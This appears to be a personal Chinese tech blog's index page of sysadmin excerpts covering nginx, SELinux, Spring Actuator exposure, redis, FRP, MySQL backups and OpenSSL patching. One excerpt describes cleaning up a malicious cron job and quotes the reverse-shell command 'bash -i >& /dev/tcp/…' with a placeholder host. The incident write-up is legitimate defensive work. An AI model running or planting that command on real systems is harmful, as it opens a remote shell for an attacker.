lanren312的博客

从nginx1.23.0开始，所有的头都以链表的形式返回，而不是数组。v0.34 解决了这个问题。因为我的nginx是1.23.1，所以我用v0.33不行，要用v0.34这个版本。重启nginx： systemctl restart nginx。在浏览器里面就看不到 server: nginx/1.23.1。修改nginx.conf。写到这里，先上错误的截图。修改nginx.conf。再看看正确的处理方法。

我本地虚拟的为未开启防火墙，如果你开启了，要注意放开21端口。本地 telnet 服务器ip 21。

在官网下载并安装putty。

将sql导出来拷贝到excel中，单击选中要整理的sql，在【数据】中找到【分列】，点击分隔符号，勾选逗号、其他（输入【'】），ps: 按【逗号+其它】分最合适。2、按shift，鼠标点击该列下的某一行（例如第100行），就会选中这些行（一到100行），按Ctrl+D键就可以快速填充选中的行了。拆分完后手动填充【'】 、【','】，注意文本输入是【''】 、【'','】1、按Ctrl+shift+下方向键选中整列；在某列的第一个单元格中手动输入需要的内容，点击选中该单元格。

下载前会让你先登录，如果没有账号就需要先去注册账号哟。redhat官方地址。

需要得到root的允许，root在/etc/sudoers文件找到下面这一行。语法： chage [options] 用户。

第三步虽然解决了问题，但百度查了下百度下SELinuxSeLinux全称Security-Enhanced Linux即安全增强型Linux，它是一个Linux内核模块，也是Linux的一个安全子系统。SELinux主要作用就是最大限度地减小系统中服务进程可访问的资源，设想一下，如果一个以root身份运行的网络服务存在0day漏洞，黑客就可以利用这个漏洞，以root的身份在您的服务器上为所欲为了，SeLinux就是来解决这种问题的。参考博客。

如果有人恶意破解你的服务器，下面的操作可以起到一定的作用，连续登录失败锁定账户一段时间，让攻击者的成本增加，从而降低服务器被恶意破解的风险。参考博客。

最近在虚拟机上整个centos7.9，想要把程序设置成开机自启动，发现rc.local状态是failed，重启服务器也没用。在 /etc/rc.local最下面添加 source /etc/profile，再添加想要执行的xx.sh脚本。然而仔细检查后并没有发现什么问题。自己之前写过两篇相关的博客。重启服务器，完美解决。

处理办法，加上enable(false)或者将SwaggerConfig给注释掉，弊端就是你自己也访问不了接口文档。通过下面链接可以获取到接口信息。

Actuator 是 Springboot 提供的用来对应用系统进行 自省和监控的功能模块，借助于 Actuator ，开发者可以很方便地对应用系统的某些监控指标进行查 看、统计等。在 Actuator 启用的情况下，如果没有做好相关权限控制，非法用户可通过访问默认的执行器端点（ endpoints ）来获取应用系统中的监控信息。非法用户可通过访问默认的执行器端点（ endpoints ）来获取应用系统中的监控信息。在浏览器中输入 ip:port/方法二：完全禁用Actuator。

redis默认启动方法都是以root启动的，不安全，现在创建一个新的用户来启动。

检测说明：进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1，符合可疑进程参数的特性.发现有记录 * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1。客户今天持续收到服务器告警，给出了可以参数信息。告警说明：Linux反弹shell行为。再去看cron日志，果然一分钟一次。果断将里面的内容清空，到此告警消失。

3、win+R 输入 regedit，在弹出的注册表编辑器的HKEY_CLASSES_ROOT中搜索 lanren312，这个要确保唯一。4、在前端 windows.open("lanren312://") 就可以打开本地的exe程序。2、编辑内容，将软件标识和启动路径换成你自己的，保存关闭后双击运行。1、新建一个lanren312.reg文件，填写模板内容。

前阵子自己安装了WMware16、centos7，配置好jdk、mysql、nginx、redis并设置好开机自动启动后，打算将服务也做成自启动，因为之前做过本以为会很顺利，结果整了快两小时，觉得有必要记录下。配置好后重启虚拟机发现运行java的脚本没运行成功，排查开始......先上配置文件。

在同一个局域网内，需要实现文件共享，通过连接访问并可以下载。

升级到mysql8后，执行脚本报错，大致意思就是密码不能写在脚本中。mysql5的备份脚本 mysqlbackup.sh。修改脚本 mysqlbackup.sh。定时启动脚本请参考我的博客。想要做成脚本启动，参考。修改my.cnf配置文件。

视频在云服务器的OOS上，前端vue查看视频使用了video-player组件，在自己的云服务器上视频播放正常，但是在客户的服务器上视频无法播放。排除地域问题，之前有在nginx中有配置 add_header X-Frame-Options SAMEORIGIN;重启nginx发现视频还是无法播放，临时解决办法，直接使用window.open(url, "_blank");有尝试修改 X-Frame-Options。

依赖于：Github开源软件FRPfrp 主要由 客户端(frpc) 和 服务端(frps) 组成服务端(frps)-部署在具有公网IP的机器上客户端(frpc)-部署在需要穿透的内网服务所在的机器上 （我部署在window机器上）

先看看官网的一些操作提示1、创建SSH密钥对2、创建制品仓库 /opt/coding/ 是我的云服务器jar包所在地，/opt/coding/ start.sh 是启动的脚本2、环境变量 配置完成后，点击 立即构建，稍等一会就可以看到构建成功构建过程中碰到的问题 提交工单，客服回复 “Auth fail是ssh密钥认证失败，麻烦本地检查一下密钥是否能够正常连接到目标服务器”，后发现公钥 id_rsa.pub 的内容复制到服务器的 ~/.ssh/a

本地机器A使用tomcat部署服务，同一个局域网的机器B通过浏览器无法访问到机器A, ping ip是可以的。解决办法一：机器A、B讲防火墙都关掉，机器B通过浏览器就能闻到部署在机器A上的服务，很暴力但感觉不是很友好。解决办法二：防火墙入栈规则添加8080（tomcat默认）端口，可根据实际修改。大概原因就是：防火墙。

1、win+r, 输入control，回车。

远程部署被告知不能使用ftp工具还是那个传文件，只能使用U盘拷贝，脑壳疼..

突然接到任务要维护服务器，一脸懵逼，硬着头皮上.....Openssl OpenSSL 代码问题漏洞（CVE-2020-1967） 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.openssl.org/news/secadv/20200421.txt文档中指出：这些版本的用户应升级到 OpenSSL 1.1.1。Openssl OpenSSL 代码问题漏洞（CVE-2020-1967） 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.openssl.